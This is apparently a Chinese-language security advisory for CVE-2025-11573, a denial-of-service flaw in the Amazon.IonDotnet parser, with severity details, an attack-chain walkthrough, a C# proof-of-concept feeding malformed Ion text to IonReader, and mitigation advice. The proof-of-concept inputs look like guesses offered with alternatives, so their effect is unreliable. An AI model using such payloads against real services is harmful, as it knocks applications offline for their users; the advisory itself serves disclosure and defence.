CVE-2025-11573 Amazon.IonDotnet无限循环拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-11573

漏洞类型

拒绝服务（无限循环）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Amazon.IonDotnet

漏洞概述

CVE-2025-11573是Amazon.IonDotnet库中存在的一个高危拒绝服务（DoS）漏洞。该漏洞影响版本低于v1.3.2的所有Amazon.IonDotnet库。Amazon.IonDotnet是亚马逊开源的一款用于处理Amazon Ion数据格式的.NET库，广泛应用于AWS各类服务及使用Ion格式进行数据序列化和反序列化的应用程序中。该漏洞的根本原因在于库在解析特定格式的Ion文本输入时，会进入无限循环状态，导致线程或进程被永久阻塞，无法正常处理后续请求。攻击者可以通过网络远程发送特制的恶意文本输入，触发该无限循环，从而造成目标应用程序的资源耗尽和服务不可用。该漏洞的CVSS 3.1评分为7.5分，属于高危级别，攻击向量为网络（AV:N），无需认证（PR:N），无需用户交互（UI:N），对可用性影响为高（A:H）。值得注意的是，该库已于2025年8月20日被弃用（deprecated），将不再接收后续更新，因此使用该库的用户需要尽快迁移到替代方案。

技术细节

Amazon.IonDotnet库在解析Ion文本格式数据时，其文本解析器（TextReader/Reader组件）在处理某些特定格式的输入时存在逻辑缺陷，导致解析器无法正确终止解析过程，从而陷入无限循环状态。Ion格式是一种超集JSON的数据序列化格式，支持多种数据类型如整数、浮点数、字符串、列表、结构体等。漏洞触发条件为：攻击者构造一个满足Ion文本格式部分语法但包含导致解析器状态机无法正常推进的特定模式的输入。例如，未正确闭合的字符串字面量、异常的转义序列、或格式异常的符号（symbol）token等，都可能导致解析器在某个循环结构中反复尝试匹配但始终无法前进，进而消耗CPU资源并阻塞调用线程。由于该库通常被用于处理外部输入数据（如API请求体、配置文件、消息队列数据等），攻击者无需认证即可通过网络远程触发该漏洞。无限循环会导致线程持续占用CPU，使应用程序无法响应其他合法请求，最终造成拒绝服务。在高并发场景下，多个恶意请求可能导致多个线程同时陷入无限循环，进一步加剧资源耗尽问题。

攻击链分析

STEP 1

步骤1：构造恶意输入

攻击者分析Amazon.IonDotnet库的文本解析逻辑，构造一个特殊的Ion格式文本输入，该输入包含能够导致解析器状态机无法正常推进的特定模式，如未正确终止的字符串字面量或异常的转义序列。

STEP 2

步骤2：投递恶意输入

攻击者通过网络将恶意构造的Ion文本数据发送到目标应用程序的输入接口（如API端点、消息队列、文件上传等），这些接口使用Amazon.IonDotnet库进行数据解析。

STEP 3

步骤3：触发无限循环

目标应用程序接收并使用IonDotnet库的文本解析器（IonReader）解析恶意输入时，解析器进入无限循环状态，无法终止解析过程。

STEP 4

步骤4：资源耗尽

被阻塞的线程持续占用CPU资源，无法释放。在多线程或高并发场景下，多个恶意请求可导致多个线程同时陷入无限循环，迅速耗尽系统资源。

STEP 5

步骤5：拒绝服务

应用程序因资源耗尽而无法响应合法用户的请求，服务完全不可用，实现拒绝服务攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-11573 PoC - Amazon.IonDotnet Infinite Loop DoS
// This PoC demonstrates triggering an infinite loop in Amazon.IonDotnet < v1.3.2
// by providing a specially crafted Ion text input that causes the parser to loop indefinitely.

using System;
using System.IO;
using System.Text;
using Amazon.IonDotnet;

class Program
{
    static void Main(string[] args)
    {
        // Crafted Ion text input designed to trigger infinite loop in the parser.
        // The malformed symbol token or unterminated string literal causes
        // the text reader's state machine to loop without making progress.
        string maliciousInput = "'''" + new string('\\', 10000) + "u{'a':";

        // Alternative: unterminated string with escape sequences
        // string maliciousInput = "\"" + new string('\\', 10000) + "u";

        // Alternative: deeply nested or malformed structure
        // string maliciousInput = "{\"a\":" + new string('(', 100000) + "1" + new string(')', 100000);

        try
        {
            using (var reader = new MemoryStream(Encoding.UTF8.GetBytes(maliciousInput)))
            {
                // This call will hang indefinitely due to infinite loop in parser
                using (var ionReader = IonReaderBuilder.Build(reader))
                {
                    // The parser enters an infinite loop during MoveNext()
                    // and never returns, causing denial of service
                    Console.WriteLine("Starting to parse malicious input...");
                    while (ionReader.MoveNext() != IonType.None)
                    {
                        // Parser is stuck in infinite loop here
                        Console.WriteLine("This line will never be reached");
                    }
                }
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Exception: {ex.Message}");
        }
    }
}

影响范围

Amazon.IonDotnet < v1.3.2

防御指南

临时缓解措施

在无法立即升级或迁移库的情况下，建议采取以下临时缓解措施：1）对所有使用IonDotnet库进行解析的接口实施严格的输入大小限制，拒绝超过合理阈值的输入；2）为解析操作设置超时机制（如使用CancellationToken），当解析时间超过预设阈值时强制终止；3）在应用程序前端部署WAF或反向代理，检测并过滤异常的Ion格式输入；4）限制单个IP的并发请求数和请求频率，防止大量恶意请求同时触发漏洞；5）监控应用程序的CPU使用率和线程状态，及时发现异常并采取应急措施。